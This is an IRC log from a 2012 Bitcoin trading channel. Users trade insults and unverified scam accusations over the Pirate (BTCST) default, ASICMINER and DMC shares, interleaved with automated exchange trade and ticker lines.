19:25:26 The really funny thing is the one thing about pirate no one has questioned yet wtf? Sep 08 19:25:31 lol Sep 08 19:25:35 The really funny thing is the one thing about pirate no one has questioned yet wtf? Sep 08 19:25:42 usagi are you just a troll? Sep 08 19:25:49 or will you finish that? Sep 08 19:25:50 usagi are you just a troll? Sep 08 19:25:54 The really funny thing is the one thing about pirate no one has questioned yet wtf? Sep 08 19:26:00 fuck you Sep 08 19:26:06 troll Sep 08 19:26:13 lmao Sep 08 19:26:17 goat ill sell you info on usagi Sep 08 19:26:23 i dont want it Sep 08 19:26:29 trust me you do Sep 08 19:26:30 i know who he is Sep 08 19:26:31 occulta how much is it ? Sep 08 19:26:34 wanta be lady boy... Sep 08 19:26:38 21mil Sep 08 19:26:42 only 21mil* Sep 08 19:26:54 21 mil zimbabwe dollars i hope. Sep 08 19:27:00 usagi is a troll and is fucked cuz his pirate insrueance is with pirate Sep 08 19:27:21 goat, why did pirate pay out any bitcoin Sep 08 19:27:23 do you think Sep 08 19:27:37 https://glbse.com/asset/view/NYAN.A << looky, the "safe" fund is trading at 0.99 one day before interest :D Sep 08 19:27:40 so more people would pay him Sep 08 19:27:43 why payout some, if you arent going to payout all ? Sep 08 19:27:50 no i am talking since default. Sep 08 19:27:52 account closures Sep 08 19:27:57 occulta he paid less than 1k and nobody confirmed it yet Sep 08 19:28:03 occulta he paid one account worth 10 btc Sep 08 19:28:15 goat that is lies Sep 08 19:28:23 usagi knows nothing and is trolling Sep 08 19:28:26 mircea_popescu: and i did confirm it Sep 08 19:28:31 o, you were paid ? Sep 08 19:28:38 yes ^ Sep 08 19:28:38 this is news to me. how much ? Sep 08 19:28:45 138btc Sep 08 19:28:50 Chaang that was me buying the S.Dice btw ^^ Sep 08 19:28:51 aha. i had no ideea. Sep 08 19:28:53 leftover from transfer to a trust account Sep 08 19:28:54 [MPEX] [S.MPOE] 3797 @ 0.00039744 = 1.5091 BTC [-] Sep 08 19:28:55 [MPEX] [S.MPOE] 13803 @ 0.00039731 = 5.4841 BTC [-] Sep 08 19:28:56 fixing my backing ratio Sep 08 19:29:00 interesting to know Sep 08 19:29:06 including interest... Sep 08 19:29:19 i said already Sep 08 19:29:20 my account is now closed Sep 08 19:29:35 i had some people who said they were gonna tell me if they get paid, nobody said anything, and many names on that 23 list were unknown Sep 08 19:29:42 no, everyone knows he said he would Sep 08 19:29:43 but i think it lists pigeons or someone, and they neve said anything Sep 08 19:29:44 [17:28:04] occulta he paid one account worth 10 btc > you can make this 2 accounts now worth 148btc Sep 08 19:30:05 just cuz he siad he would does not mean he will Sep 08 19:30:09 expect a change dumbass Sep 08 19:30:39 i told you Sep 08 19:30:54 occulta still, significantly under 1k Sep 08 19:30:59 when were you paid ? Sep 08 19:31:02 ? Sep 08 19:31:07 usagi go fuck yourself Sep 08 19:31:15 expect a change with tera mining Sep 08 19:31:16 mircea_popescu: true, but i dont doubt he paid the 23 one bit Sep 08 19:31:22 weeks ago Sep 08 19:31:32 occulta well maybe that's true. i guess it could have been to buy time ? Sep 08 19:31:59 i know, im shocked you have been so rude to me tonight Sep 08 19:32:02 trying to sell me info Sep 08 19:32:04 ;;echo this Chaang-Noi - usagi exchange was funny/ Sep 08 19:32:05 this Chaang-Noi - usagi exchange was funny/ Sep 08 19:32:06 mircea_popescu: i guess, but the time between paying 11, then another 12, was about a week itself Sep 08 19:32:09 what a fail cat you are Sep 08 19:32:13 occulta this is true. Sep 08 19:32:32 usagi you are soon out the door Sep 08 19:32:40 in my btcst account there is actually a comment for the closure Sep 08 19:32:43 thats why i never worked with you Sep 08 19:33:00 [MPEX] [S.MPOE] 7490 @ 0.00039731 = 2.9759 BTC [-] Sep 08 19:33:01 [MPEX] [S.MPOE] 40744 @ 0.00039722 = 16.1843 BTC [-] Sep 08 19:33:02 [MPEX] [S.MPOE] 1975 @ 0.00039717 = 0.7844 BTC [-] Sep 08 19:33:03 [MPEX] [S.MPOE] 7591 @ 0.00039676 = 3.0118 BTC [-] Sep 08 19:33:11 occulta what does it say ? Sep 08 19:33:19 copies yarr???? Sep 08 19:33:25 08/23/2012 21:33 Account Closure @ 135.02737407 Final Payment = 135.02737407 BTC @ 2.4% = 138.26803104 Sep 08 19:33:28 lol i had my btc in the blok chain, you had your btc in pirate Sep 08 19:33:39 i made myinsrues to show you how its done Sep 08 19:33:46 occulta so now we know how it was planned to close i guess Sep 08 19:33:57 mircea_popescu: maybe yes Sep 08 19:34:02 you gave it to people who gave it to pirate, and you did so knowing i told you they would do it Sep 08 19:34:08 i told dead t the same Sep 08 19:34:10 and shock.... Sep 08 19:34:13 i was right Sep 08 19:34:24 now go fuck yuorself for sellikng secret info ass hat Sep 08 19:34:33 gotta turn a buck lol Sep 08 19:34:47 CATFIGHT COMENSE, IN THE LEFT CORNER WE HAVE A GOAT IN THE RIGHT CORNER WE HAVE SAILOR MOON. LET'S GET READY TO RUMBLE!!!! Sep 08 19:34:48 yeah i did not need to sell assets, i had the coin in the block chain.. so i went on a boat ride Sep 08 19:35:05 yes dumbass Sep 08 19:35:08 weeks ago Sep 08 19:35:17 i called priate defaly 2 weeks before pirate did Sep 08 19:35:22 default Sep 08 19:35:36 deadt you know he is a guy... i told you i got his docs Sep 08 19:35:56 cuz you want to sell info Sep 08 19:36:18 what is the price for your secret info? Sep 08 19:36:25 come one Sep 08 19:36:30 let us see what it is worth Sep 08 19:36:35 what is your price? Sep 08 19:36:44 you asked for money for info now tell us your price Sep 08 19:36:56 what is your price? Sep 08 19:37:07 deadt you know he is a guy... i told you i got his docs. You are not a goat either though :P Sep 08 19:37:08 lol Sep 08 19:37:21 I have tons of secret info Sep 08 19:37:21 no imnot really a goat Sep 08 19:37:41 send me 1 million usd in to this BTC address and I will give you all themz secretz informationz Sep 08 19:37:48 :) Sep 08 19:38:12 once i found out who usagi was i lots full interst in working with him, esp after he did send his insurance money to pirate (indirectly) Sep 08 19:38:14 oh well Sep 08 19:38:27 mircea is more fail than just about anyone Sep 08 19:38:34 id trust pirate today over mircea Sep 08 19:38:49 i ahve your docs... Sep 08 19:39:12 [MPEX] [S.MPOE] 7600 @ 0.00039676 = 3.0154 BTC [-] Sep 08 19:39:14 you know that would betrey trusts. Sep 08 19:39:21 but you are a guy and you know it Sep 08 19:39:27 wanta be aldy boy Sep 08 19:39:28 lol DeaDTerra Sep 08 19:40:05 lol Sep 08 19:40:16 you got fucked like we said you would Sep 08 19:40:28 right Sep 08 19:41:10 okay since i dont know anything im going to have a beer and smoke a cuban, best of luck with selling your secret info usagi Sep 08 19:41:56 cigars and beer ? get out of the sticks. Sep 08 19:41:57 YOU DON'T KNOW NOTHING MAN, YOUR A GOAT AND I AM SAILOR MOON. seriously guys go get a room, I am running out of funny comments here Sep 08 19:43:30 I'll sell you the info Sep 08 19:43:53 btchero are you there? Sep 08 19:44:17 I'll sell you the info Sep 08 19:44:25 sell it to me Sep 08 19:44:29 name your price Sep 08 19:45:03 I'll sell you the info Sep 08 19:45:11 sell it to me... i have money Sep 08 19:45:20 [GLBSE] [BIF.P2P.LOANS] 10 @ 0.1 = 1 BTC Sep 08 19:45:25 I'll sell you the info Sep 08 19:45:34 mircea can make a post? Sep 08 19:45:41 wow thats good for it Sep 08 19:45:51 copy paste is good for it Sep 08 19:45:55 its must be taking classes Sep 08 19:47:29 [MPEX] [S.MPOE] 15880 @ 0.00040074 = 6.3638 BTC [+] Sep 08 19:47:30 [MPEX] [S.MPOE] 29320 @ 0.00040085 = 11.7529 BTC [+] Sep 08 19:47:51 I'll sell you the info Sep 08 19:48:01 sell it to me or apoligize for being full of shit Sep 08 19:48:17 [GLBSE] [OBSI.HRPT] 5 @ 0.102 = 0.51 BTC [+] Sep 08 19:48:26 ? Sep 08 19:48:29 lol Sep 08 19:48:33 you are a troll Sep 08 19:48:36 I'll sell you the info Sep 08 19:48:38 name a price Sep 08 19:48:44 i want the secrets! Sep 08 19:48:44 [MPEX] [B.MPCD.B] 29697 @ 0.00101019 = 29.9996 BTC [+] Sep 08 19:49:39 I like turtles Sep 08 19:50:10 shut up females Sep 08 19:50:20 me too Rothgar Sep 08 19:50:20 your diarrhea is stinking out the room Sep 08 19:50:32 I'll sell you the info Sep 08 19:50:36 lol Sep 08 19:50:42 your diarrhea is stinking out the room << Sep 08 19:51:04 im just blowing out smoke Sep 08 19:51:08 well i will let usagi find a price and get back to me... Sep 08 19:51:17 his secret info must be worth a lot Sep 08 19:51:29 if off for the night Sep 08 19:51:40 night goat Sep 08 19:51:43 catch you all tomorrow for the matthew gets fucked day Sep 08 19:51:49 lol Sep 08 19:52:04 anyone still cares about wright ? Sep 08 19:52:07 tomorrow is going to be a fun day :D Sep 08 19:52:18 night PsychoticBoy peace everyone... yes it will be DeadT :) Sep 08 19:55:42 so about this secret...exactly how much do u want ? Sep 08 19:55:45 I will be sitting laughing my ass off as all the people who think they have hedged their losses lose it all xD Sep 08 19:55:54 I have a secret Sep 08 19:55:56 awww Sep 08 19:55:58 how much do you bid for it? Sep 08 19:56:10 [GLBSE] [NYAN.C] 1 @ 0.69 BTC [+] Sep 08 19:56:30 well I have two with actual value, neither which I will sell fo course :P But I can sell you a worthless one :D Sep 08 19:56:37 of* Sep 08 19:56:49 do the secrets relate to pirate Sep 08 19:57:21 [GLBSE] [PUREMINING] 2 @ 0.09577 = 0.1915 BTC [+] Sep 08 19:57:29 Yes one of the directly one of them indirectly Sep 08 19:58:15 i cant access youtube in china Sep 08 19:58:17 damn Sep 08 19:58:58 [GLBSE] [GSDPT] 6 @ 0.003395 = 0.0204 BTC [+] Sep 08 19:59:14 [GLBSE] [OBSI.HRPT] 2 @ 0.102 = 0.204 BTC [+] Sep 08 19:59:32 [GLBSE] [GSDPT] 2 @ 0.003395 = 0.0068 BTC [+] Sep 08 19:59:37 if pirate pays back some of the coins tomorrow...like he starts paying back slowly...what happens with matthews bet? Sep 08 20:00:44 matthew said pirate has to payback ALL Sep 08 20:00:48 so he loses then Sep 08 20:02:39 ooh Sep 08 20:05:03 i always thought by doing this he can cooperate with his ppt guys and buy back debt.... Sep 08 20:05:45 it would explain all the secrecy amongst the ppt lenders Sep 08 20:10:50 usagi: But think about what that does for legitimacy. You can not use bitinstant if you want more privacy. Sep 08 20:13:14 [GLBSE] [ASICMINER] 18 @ 0.1198 = 2.1564 BTC [+] Sep 08 20:16:08 [GLBSE] [GIGAMINING] 2 @ 0.64979 = 1.2996 BTC [-] Sep 08 20:16:09 [GLBSE] [GIGAMINING] 2 @ 0.6498 = 1.2996 BTC [+] Sep 08 20:16:11 [GLBSE] [GIGAMINING] 22 @ 0.65 = 14.3 BTC [+] Sep 08 20:21:04 [GLBSE] [OBSI.HRPT] 11 @ 0.102 = 1.122 BTC [+] Sep 08 20:21:40 EskimoBob: you know Sep 08 20:21:43 I just had an idea Sep 08 20:21:51 I shall trade DMC shares for.... PIRATE DEBT! Sep 08 20:21:52 [GLBSE] [DMC] 1 @ 0.067 BTC [-] Sep 08 20:21:58 oh come on damnit Sep 08 20:22:59 [GLBSE] [TEEK.USD] 1 @ 0.087 BTC [-] Sep 08 20:23:32 !ticker tygrr.bond-p Sep 08 20:23:50 come on you fucking bot Sep 08 20:24:00 [GLBSE:TYGRR.BOND-P] [Bid: 0.04500001] [Ask: 0.07899] [Spread: 0.03398999] [Last: 0.07899] [24hVol: 34.8400348] [7dAvg: 0.10590562] Sep 08 20:24:23 !ticker dmc Sep 08 20:24:26 [GLBSE:DMC] [Bid: 0.04300001] [Ask: 0.067] [Spread: 0.02399999] [Last: 0.067] [24hVol: 0.207] [7dAvg: 0.07404529] Sep 08 20:26:14 usagi: Ill pay you 100 dmc for them. Sep 08 20:28:48 [GLBSE] [NYAN.B] 5 @ 0.988 = 4.94 BTC [-] Sep 08 20:29:35 lmao this is getting better and better. Sep 08 20:30:55 [GLBSE] [OBSI.HRPT] 6 @ 0.102 = 0.612 BTC [+] Sep 08 20:30:55 mircea_popescu: who knows, pirate could end up paying Sep 08 20:30:56 lol Sep 08 20:31:11 right Sep 08 20:32:28 [GLBSE] [OBSI.HRPT] 48 @ 0.10199999 = 4.896 BTC [-] Sep 08 20:32:29 [GLBSE] [OBSI.HRPT] 1 @ 0.10165 BTC [-] Sep 08 20:34:45 !ticker yarr Sep 08 20:34:54 [GLBSE:YARR] [Bid: 1.02] [Ask: 1.29989999] [Spread: 0.27989999] [Last: 1.01] [24hVol: 192.79001961] [7dAvg: 1.05587071] Sep 08 20:34:56 lmao doing the math for giga.etf. 0.0173+0.016075+0.0156+0.014425 Sep 08 20:35:02 that;s a horrible trend right there. Sep 08 20:35:52 [MPEX] [F.GIGA.ETF] [PAID] 1100000 @ 0.0000634 = 69.74 BTC Sep 08 20:36:46 mircea_popescu: thats per share div pay? Sep 08 20:37:11 yeah Sep 08 20:37:22 giga is fixed Sep 08 20:37:23 thats why Sep 08 20:37:39 in mh you mean ? Sep 08 20:37:40 fixed = no balls? Sep 08 20:37:43 lol Sep 08 20:37:44 lol Sep 08 20:38:04 oh, he has balls Sep 08 20:38:14 that whole tera upgrade shit was lol Sep 08 20:41:18 we will see what happens when asics arive Sep 08 20:41:43 [GLBSE] [FOO.PPPPT] 5 @ 0.1 = 0.5 BTC [+] Sep 08 20:41:50 !ticker FDBF Sep 08 20:41:50 PsychoticBoy i think most of the bets atm are along the lines "will they hit before or after xmas" Sep 08 20:42:02 after Sep 08 20:42:11 for sure Sep 08 20:42:30 [GLBSE:FDBF] [Bid: 0.01000001] [Ask: 0.15] [Spread: 0.13999999] [Last: 0.15] [24hVol: 27.3] [7dAvg: 0.14999069] Sep 08 20:42:49 maybe some other developer will be first, BFL will sertainly not be first Sep 08 20:42:58 c Sep 08 20:43:09 well you know how it is... nobody knows. Sep 08 20:43:30 look at the past, they lied over and over Sep 08 20:43:37 (bfl) Sep 08 20:44:05 [MPEX] [S.MPOE] 23280 @ 0.00040085 = 9.3318 BTC [+] Sep 08 20:44:06 [MPEX] [S.MPOE] 30220 @ 0.00040308 = 12.1811 BTC [+] Sep 08 20:45:09 PsychoticBoy yeah, but they also delivered items. which is more than can be said for the competition, which seems vaporware. Sep 08 20:45:32 mindyou, i'm not saying they'll ever deliver or anything. Sep 08 20:45:40 just, very speculative either way at this point. Sep 08 20:49:08 http://bitcoin-otc.com/viewratingdetail.php?nick=pirateat40&sign=ANY&type=RECV Sep 08 20:49:11 pirate, now at 53 Sep 08 20:49:15 this saga is fun to watch Sep 08 20:50:24 still no historical chart dammit Sep 08 20:50:41 like asicminer (who tried it a year ago) Sep 08 20:50:58 which contract plausible also Sep 08 20:51:16 [MPEX] [S.MPOE] 19800 @ 0.00039863 = 7.8929 BTC [-] Sep 08 20:52:04 5. If the total money raised from ASICMINER and the real-world is not Sep 08 20:52:04 enough to Sep 08 20:52:04 cover the cost required by the foundry to tape out the ASIC chips before Sep 08 20:52:04 August Sep 08 20:52:04 28, 2011, 100.5% of the total Bitcoins raised from ASICMINER will be Sep 08 20:52:05 returned Sep 08 20:52:07 to investors, in which the 0.5% is for compensating the GLBSE fee Sep 08 20:52:09 lmfao Sep 08 20:52:12 2011 is past Sep 08 20:52:29 well... global scam exchange style contracts. Sep 08 20:52:32 scammers just like asicminer in 2011 Sep 08 20:52:41 could be same dude Sep 08 20:53:56 google asicminer and you`ll see, asicm,iner is a scam, and thats for sure Sep 08 20:55:30 asicminer: next glbse bubble Sep 08 20:55:37 http://whois.domaintools.com/asicminer.net you mean this ? Sep 08 20:55:38 poef 0.01 Sep 08 20:56:42 yep, and you can find more... Sep 08 20:57:27 probably same scam Sep 08 20:57:53 so remind: DO NOT INVEST WHAT YOU CANT AFFORD TO LOSE! Sep 08 20:58:23 well that's generally the rule. Sep 08 20:58:33 I know, just for the noobs Sep 08 21:03:03 [GLBSE] [OBSI.1MHS] 1 @ 0.15 BTC [+] Sep 08 21:03:51 [GLBSE] [MMM] 2 @ 0.9 = 1.8 BTC [-] Sep 08 21:08:28 [GLBSE] [GIGAMINING] 2 @ 0.61012 = 1.2202 BTC [-] Sep 08 21:08:29 [GLBSE] [GIGAMINING] 2 @ 0.61011 = 1.2202 BTC [-] Sep 08 21:08:30 [GLBSE] [GIGAMINING] 8 @ 0.6101 = 4.8808 BTC [-] Sep 08 21:08:31 [GLBSE] [GIGAMINING] 4 @ 0.61 = 2.44 BTC [-] Sep 08 21:09:45 [MPEX] [F.GIGA.ETF] 8400 @ 0.00074182 = 6.2313 BTC [-] Sep 08 21:09:46 [MPEX] [F.GIGA.ETF] 10857 @ 0.00073984 = 8.0324 BTC [-] Sep 08 21:09:48 [MPEX] [F.GIGA.ETF] 5200 @ 0.00073931 = 3.8444 BTC [-] Sep 08 21:09:49 [MPEX] [F.GIGA.ETF] 20270 @ 0.00073429 = 14.8841 BTC [-] Sep 08 21:09:50 [MPEX] [F.GIGA.ETF] 475 @ 0.00072046 = 0.3422 BTC [-] Sep 08 21:09:50 [MPEX] [F.GIGA.ETF] 24352 @ 0.0007192 = 17.514 BTC [-] Sep 08 21:09:51 [MPEX] [F.GIGA.ETF] 900 @ 0.00071558 = 0.644 BTC [-] Sep 08 21:09:53 [MPEX] [F.GIGA.ETF] 4989 @ 0.00070565 = 3.5205 BTC [-] Sep 08 21:09:54 [MPEX] [F.GIGA.ETF] 20256 @ 0.00069889 = 14.1567 BTC [-] Sep 08 21:09:55 [MPEX] [F.GIGA.ETF] 4600 @ 0.00069318 = 3.1886 BTC [-] Sep 08 21:09:56 [MPEX] [F.GIGA.ETF] 13400 @ 0.00069108 = 9.2605 BTC [-] Sep 08 21:09:57 [MPEX] [F.GIGA.ETF] 600 @ 0.00067632 = 0.4058 BTC [-] Sep 08 21:09:58 [MPEX] [F.GIGA.ETF] 7620 @ 0.00067226 = 5.1226 BTC [-] Sep 08 21:09:59 [MPEX] [F.GIGA.ETF] 5801 @ 0.00065494 = 3.7993 BTC [-] Sep 08 21:09:59 [GLBSE] [YABMC] 1 @ 0.1192 BTC [+] Sep 08 21:10:00 [MPEX] [F.GIGA.ETF] 30100 @ 0.00064438 = 19.3958 BTC [-] Sep 08 21:10:01 [MPEX] [F.GIGA.ETF] 500 @ 0.00061571 = 0.3079 BTC [-] Sep 08 21:10:02 [MPEX] [F.GIGA.ETF] 8869 @ 0.00061548 = 5.4587 BTC [-] Sep 08 21:10:04 [MPEX] [F.GIGA.ETF] 12605 @ 0.00061414 = 7.7412 BTC [-] Sep 08 21:10:05 [MPEX] [F.GIGA.ETF] 11400 @ 0.0006 = 6.84 BTC [-] Sep 08 21:10:06 [MPEX] [F.GIGA.ETF] 8865 @ 0.00059472 = 5.2722 BTC [-] Sep 08 21:10:07 [MPEX] [F.GIGA.ETF] 30840 @ 0.0005877 = 18.1247 BTC [-] Sep 08 21:10:08 [MPEX] [F.GIGA.ETF] 33900 @ 0.00058239 = 19.743 BTC [-] Sep 08 21:10:08 [MPEX] [F.GIGA.ETF] 50000 @ 0.00055 = 27.5 BTC [-] Sep 08 21:10:17 damn Sep 08 21:10:44 someone wanted out Sep 08 21:10:55 yeah really Sep 08 21:11:05 and plenty left at 55 Sep 08 21:11:10 i srsly wonder wtf. Sep 08 21:11:19 is giga insolvent now ? Sep 08 21:11:32 !ticker f.giga.etf Sep 08 21:11:33 [MPEX:F.GIGA.ETF] 1day: 0.00055 / 0.00066498 / 0.0007446 (498173 shares, 331.28 BTC), 30day: 0.00055 / 0.00092329 / 0.00115139 (11310677 shares, 10,443.13 BTC) Sep 08 21:11:55 .py 0.0000634 / 0.00066498 Sep 08 21:11:57 0.0953412132696 Sep 08 21:12:26 [GLBSE] [JLP-BMD] 2 @ 0.0998 = 0.1996 BTC [-] Sep 08 21:12:29 maybe they were just waiting for me to pay out the divs... Sep 08 21:12:59 [GLBSE] [GIGAMINING] 7 @ 0.6001 = 4.2007 BTC [-] Sep 08 21:13:20 [GLBSE] [OBSI.HRPT] 1 @ 0.1017 BTC [+] Sep 08 21:13:32 [GLBSE] [OBSI.HRPT] 1 @ 0.1017 BTC [+] Sep 08 21:15:42 [MPEX] [S.MPOE] 16791 @ 0.00039863 = 6.6934 BTC [-] Sep 08 21:17:19 [GLBSE] [DMC] 6 @ 0.0666 = 0.3996 BTC [-] Sep 08 21:18:11 [MPEX] [B.MPCD.A] 11918 @ 0.00100683 = 11.9994 BTC [+] Sep 08 21:18:26 [GLBSE] [ASICMINER] 1 @ 0.116 BTC [-] Sep 08 21:18:36 [GLBSE] [ASICMINER] 4 @ 0.115 = 0.46 BTC [-] Sep 08 21:18:37 [GLBSE] [ASICMINER] 46 @ 0.11301001 = 5.1985 BTC [-] Sep 08 21:19:14 [GLBSE] [ASICMINER] 54 @ 0.11301001 = 6.1025 BTC [-] Sep 08 21:19:16 [GLBSE] [ASICMINER] 5 @ 0.11301 = 0.5651 BTC [-] Sep 08 21:19:17 [GLBSE] [ASICMINER] 73 @ 0.113 = 8.249 BTC [-] Sep 08 21:19:18 [GLBSE] [ASICMINER] 5 @ 0.11281 = 0.5641 BTC [-] Sep 08 21:19:20 [GLBSE] [ASICMINER] 5 @ 0.11252 = 0.5626 BTC [-] Sep 08 21:19:21 [GLBSE] [ASICMINER] 20 @ 0.11251101 = 2.2502 BTC [-] Sep 08 21:19:22 [GLBSE] [ASICMINER] 1 @ 0.11251 BTC [-] Sep 08 21:19:22 [GLBSE] [ASICMINER] 22 @ 0.11251 = 2.4752 BTC [-] Sep 08 21:19:23 [GLBSE] [ASICMINER] 30 @ 0.11251 = 3.3753 BTC [-] Sep 08 21:19:24 [GLBSE] [ASICMINER] 20 @ 0.11240001 = 2.248 BTC [-] Sep 08 21:19:26 [GLBSE] [ASICMINER] 40 @ 0.1124 = 4.496 BTC [-] Sep 08 21:19:27 [GLBSE] [ASICMINER] 7 @ 0.1122 = 0.7854 BTC [-] Sep 08 21:19:27 wtf, whos selling out? Sep 08 21:19:28 lol asin=cmin3er dump Sep 08 21:19:28 [GLBSE] [ASICMINER] 20 @ 0.11111001 = 2.2222 BTC [-] Sep 08 21:19:29 [GLBSE] [ASICMINER] 46 @ 0.11111 = 5.1111 BTC [-] Sep 08 21:19:30 [GLBSE] [ASICMINER] 30 @ 0.11110001 = 3.333 BTC [-] Sep 08 21:19:31 [GLBSE] [ASICMINER] 50 @ 0.11011001 = 5.5055 BTC [-] Sep 08 21:19:31 [GLBSE] [ASICMINER] 52 @ 0.11011 = 5.7257 BTC [-] Sep 08 21:19:40 hahaha Sep 08 21:19:50 I sold out at 0.14 Sep 08 21:19:56 scam lol Sep 08 21:20:14 look at the contract, same scammy contract as in 2011 Sep 08 21:20:29 the date is even the same, 28 august 2011 Sep 08 21:20:30 2011 Sep 08 21:20:32 lol Sep 08 21:21:00 that was a typo, friedcat said it himself Sep 08 21:21:10 usagi: no yu havent Sep 08 21:21:17 you still have a little left Sep 08 21:21:31 only have some early details like http://whois.domaintools.com/asicminer.net Sep 08 21:21:40 lol Sep 08 21:21:45 even more recless Sep 08 21:22:22 still there is much more, just google asicminer Sep 08 21:22:41 [GLBSE] [ASICMINER] 3 @ 0.115 = 0.345 BTC [+] Sep 08 21:22:47 [GLBSE] [TYGRR.BOND-P] 20 @ 0.07899 = 1.5798 BTC [+] Sep 08 21:22:57 [GLBSE] [MOORE] 4 @ 0.4998 = 1.9992 BTC [-] Sep 08 21:23:09 is mtgox asking for id for all accountsn ow ? Sep 08 21:23:23 [GLBSE] [ASICMINER] 15 @ 0.115 = 1.725 BTC [+] Sep 08 21:23:26 EskimoBob: and you think you could do better? Sep 08 21:23:40 [GLBSE] [MOORE] 1 @ 0.4999 BTC [+] Sep 08 21:24:58 [GLBSE] [MERGEDMINING] 6 @ 0.07499 = 0.4499 BTC [+] Sep 08 21:26:16 so wheres your investment fund? Sep 08 21:27:21 where. is. it. Sep 08 21:28:51 where can others invest their coin with you? Sep 08 21:29:08 yes what novusordo said Sep 08 21:30:57 denied! Sep 08 21:31:01 ಠ_ಠ Sep 08 21:31:57 lol EskimoBob is trolling again Sep 08 21:32:29 I can do better :D Sep 08 21:32:31 look at FDBF Sep 08 21:32:33 when you start trading, you start failing Sep 08 21:32:35 mine (and paladon`s) iis on glbse Sep 08 21:32:37 in your wallet Sep 08 21:32:41 "I run an awesome public investment fund, except only certain people can invest" Sep 08 21:32:41 D don`t want to be a DICK but you don`t ansqwer decent either so wy would eskimobob?. Sep 08 21:32:43 just like on the forum Sep 08 21:32:49 o_0 Sep 08 21:34:43 PsychoticBoy: I dont think EskimoBob even has any real assets on glbse Sep 08 21:35:09 EskimoBob: yes, I made it so dmc is going to have very high returns in the future Sep 08 21:35:19 you keep thinking DMC is an investment fund Sep 08 21:35:20 its not Sep 08 21:35:26 nav means exactly shit to me Sep 08 21:36:13 how is it stupid? dmc is not an investment fund. Sep 08 21:36:38 eskimobob is just some random angry internet idiot. Sep 08 21:37:53 mircea_popescu: yeah really Sep 08 21:38:03 EskimoBob: okay so, when DMC starts selling web hosting products Sep 08 21:38:12 how do you still intend on calling it an investment fund Sep 08 21:38:35 [GLBSE] [DMC] 20 @ 0.0666 = 1.332 BTC [-] Sep 08 21:38:53 [GLBSE] [ASICMINER] 1 @ 0.1109 BTC [-] Sep 08 21:38:54 [GLBSE] [ASICMINER] 2 @ 0.111 = 0.222 BTC [+] Sep 08 21:40:16 [GLBSE] [DMC] 17 @ 0.0666 = 1.1322 BTC [-] Sep 08 21:41:19 [GLBSE] [ASICMINER] 36 @ 0.11021 = 3.9676 BTC [-] Sep 08 21:41:21 [GLBSE] [ASICMINER] 64 @ 0.11011 = 7.047 BTC [-] Sep 08 21:43:45 [GLBSE] [ASICMINER] 100 @ 0.11011 = 11.011 BTC [-] Sep 08 21:44:28 sell moar asicminer, let the price drop to 0.01 Sep 08 21:49:09 EskimoBob: you've been repeatedly implying that it is such a thing in the DMC thread Sep 08 21:49:11 when it clearly isnt Sep 08 21:49:27 [MPEX] [S.MPOE] 22500 @ 0.0003993 = 8.9843 BTC [+] Sep 08 21:52:27 EskimoBob: then pot it in the thread. Sep 08 21:52:29 *pot Sep 08 21:52:32 damnit Sep 08 21:52:35 *post Sep 08 21:52:45 heh Sep 08 21:53:17 EskimoBob: I could just have you banned from the forums, Im pretty sure you've crossed the line enough theymos would act on it Sep 08 21:54:22 [GLBSE] [GSDPT] 7 @ 0.003395 = 0.0238 BTC [+] Sep 08 21:55:29 you're welcome to start a dedicated DMC is a scam thread. Sep 08 21:56:05 [GLBSE] [SILVER] 57 @ 0.01 = 0.57 BTC [+] Sep 08 21:56:30 usagi: I traded current earnings for much greater future earnings Sep 08 21:59:30 more competition != going out of business Sep 08 21:59:35 EskimoBob: how have I not done them? Sep 08 21:59:49 holy shit. EskimoBob is my tea party. Sep 08 21:59:51 competition is good Sep 08 21:59:55 I am the obama to his tea party Sep 08 21:59:58 holy. fucking. shit. Sep 08 22:00:00 it makes sure all services being provided are up to par Sep 08 22:00:07 if there was no competition you could just keep giving the shitty service Sep 08 22:00:24 usagi: yeah but I'll just end up buying you out Sep 08 22:00:31 usagi: plus you dont have the connections to get it done Sep 08 22:00:42 [MPEX] [S.MPOE] 20200 @ 0.0003993 = 8.0659 BTC [+] Sep 08 22:00:52 look at how many companies renting out VPSes out there... i see no VPS monopoly, lol Sep 08 22:01:19 how the hell would a vps monopoly even work. Sep 08 22:01:27 usagi: hell, you want to manage my assets so bad? make me a deal. Sep 08 22:02:15 bmf? no, I'd want nyan if I did that. Sep 08 22:02:39 I ll buy DMC for 50btc Sep 08 22:03:01 50 is max eskimobob Sep 08 22:03:03 usagi: lemme look Sep 08 22:03:05 [GLBSE] [TYGRR.BOT] 7 @ 0.91 = 6.37 BTC [-] Sep 08 22:03:30 !ticker btc-mining Sep 08 22:03:33 !ticker btcmc Sep 08 22:03:36 !ticker obsi.abmo Sep 08 22:03:37 [GLBSE:BTC-MINING] [Bid: 0.9] [Ask: 0.9969] [Spread: 0.0969] [Last: 0.9979] [24hVol: ] [7dAvg: 0.99132846] Sep 08 22:03:38 and then I just pay everyshare holder 0.1 btc and flushing DMC Sep 08 22:03:49 dmc would be nomore mwuhahaha Sep 08 22:03:52 [GLBSE:BTCMC] [Bid: 0.55] [Ask: 0.5899] [Spread: 0.0399] [Last: 0.5898] [24hVol: ] [7dAvg: 0.55057777] Sep 08 22:04:05 [GLBSE:OBSI.ABMO] [Bid: 0.00010001] [Ask: 0.1] [Spread: 0.09989999] [Last: 0.09] [24hVol: ] [7dAvg: 0.08733333] Sep 08 22:04:17 so it would cost me ~ 400 btc so what Sep 08 22:04:29 1529 btc Sep 08 22:04:37 just to let this mess stop Sep 08 22:05:03 [GLBSE] [ASICMINER] 36 @ 0.11021 = 3.9676 BTC [+] Sep 08 22:05:04 [GLBSE] [ASICMINER] 64 @ 0.11011 = 7.047 BTC [-] Sep 08 22:06:00 EskimoBob: per share 0.073 Sep 08 22:06:07 I would only buy DMC to buyout shareholders and give them the assets dmc holds and then let nefario close DMC Sep 08 22:06:19 PsychoticBoy: yeah, but closing it really wouldnt DO anything Sep 08 22:06:29 it'd just mean I keep the profits Sep 08 22:06:35 yes it would stop this f*cking crap Sep 08 22:07:04 EskimoBob: you're like a month behind in DMC news. Sep 08 22:07:12 I will even pay out my own pocket to let this stop Sep 08 22:07:16 [GLBSE] [FUTUREFUND] 4 @ 0.00012433 = 0.0005 BTC [+] Sep 08 22:08:01 buy dmc, then sell all assets and return min 0.1 to all share holders Sep 08 22:08:10 and close this shit Sep 08 22:08:22 PsychoticBoy: thats an insane idea. Sep 08 22:08:31 [GLBSE] [ASICMINER] 36 @ 0.11021 = 3.9676 BTC [+] Sep 08 22:08:33 [GLBSE] [ASICMINER] 64 @ 0.11011 = 7.047 BTC [-] Sep 08 22:08:35 no its less insane than what you are doing' Sep 08 22:08:55 